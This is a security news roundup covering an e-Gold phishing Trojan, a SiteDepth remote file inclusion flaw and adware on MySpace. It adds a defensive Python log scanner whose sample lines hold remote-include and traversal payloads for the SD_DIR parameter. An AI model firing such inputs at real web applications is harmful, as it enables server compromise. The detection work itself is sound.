
Security Bytes: Spam that glitters isn't gold

Also: Some adult Web site operators may have a new threat to worry about and McAfee warns that not everyone on MySpace wants to be your friend.

Spam that glitters isn't gold
According to the SANS Internet Storm Center, an emerging email scam could result in end-users' computers becoming infected by a string of malicious files.

In a posting to the ISC Handler's Diary Sunday, ISC Director Marcus Sachs detailed the contents of an email that has started making the rounds in recent days.

The text of the message includes information about an alleged transaction involving e-Gold Ltd., an electronic payment site. The author attempts to convince the recipient that she lost currency from a transaction, but includes a screenshot detailing the problem called When opened, that file drops a series of executables and .dll files on a victim's machine, one of which includes a spyware-spreading Trojan that attempts to steal e-Gold account information.

Sachs said the issue and analysis were submitted to the ISC by a reader. "Readers… are the backbone of the SANS Internet Storm Center and we really appreciate those who send in their own analysis for us to turn around in alerts to others," Sachs said.

SiteDepth subject to .php vulnerability
The French Security Incident Response Team (FrSIRT) is one of several organizations warning of a flaw in SiteDepth, a content management system used primarily by adult Web site operators, that could enable attackers to execute arbitrary commands.

Late last week FrSIRT warned of the issue, which was first reported by David "Aesthetico" Vieira-Kurz of German security firm Major Security.

"This flaw is due to an input validation error in the 'constants.php' script that fails to validate the 'SD_DIR' parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the Web server," said FrSIRT.

The issue affects SiteDepth version 3.0.1 and prior. A patch has not yet been issued by the vendor.
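
With no vendor patch available, operators can at least look for the pattern FrSIRT describes in their own logs. The following detection sketch is an added example, not code from FrSIRT, Major Security or SiteDepth: it flags access log requests to constants.php whose SD_DIR value names a remote scheme or climbs directories. The combined log format, the paths, the addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Remote scheme or wrapper, protocol-relative URL, directory traversal, or NUL byte.
SUSPICIOUS_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:|^//|(^|[\\/])\.\.([\\/]|$)|\x00', re.I)

# Constructed sample lines (documentation addresses, .invalid host, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /sitedepth/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2000:10:00:05 +0000] "GET /sitedepth/constants.php?SD_DIR=http://files.example.invalid/a.txt%3F HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2000:10:00:09 +0000] "GET /sitedepth/constants.php?sd_dir=%252e%252e%2f%252e%252e%2fetc%2f HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2000:10:01:00 +0000] "GET /sitedepth/constants.php?SD_DIR=include/ HTTP/1.1" 200 87',
]

def suspicious_sd_dir(value):
    """Return True if an SD_DIR value looks like a remote or traversal include."""
    # Decode repeatedly so double-encoded values (%252e%252e) are normalized too.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return bool(SUSPICIOUS_RE.search(value.strip()))

def flag_requests(log_lines):
    """Return (line_number, SD_DIR value) for suspicious requests to constants.php."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/constants.php"):
            continue
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name.lower() == "sd_dir" and suspicious_sd_dir(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in flag_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious SD_DIR value {value!r}")
```

Access logs normally record only the query string, so a value sent in a POST body would not be seen by this check.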

McAfee warns of adware on MySpace
Social networking site MySpace may be popular among young and old alike, but not all the media clips being shared there are for harmless fun.

In its Avert Labs Blog, antivirus vendor McAfee Inc. warned that not only have a pair of MySpace viruses circulated this year, but it's also become a hotbed for adware.

More specifically, McAfee's Allysa Myers noted the recent Washington Post report that an advertisement posted on MySpace used the Windows Meta File (WMF) exploit that Microsoft patched earlier this year to install adware. Plus, another organization has reportedly created fake MySpace profiles to increase adware installations.

That means harmless MySpace surfing during the workday may not be so harmless after all. "There's really nothing to prevent profiles being created for questionable purposes," Myers wrote.
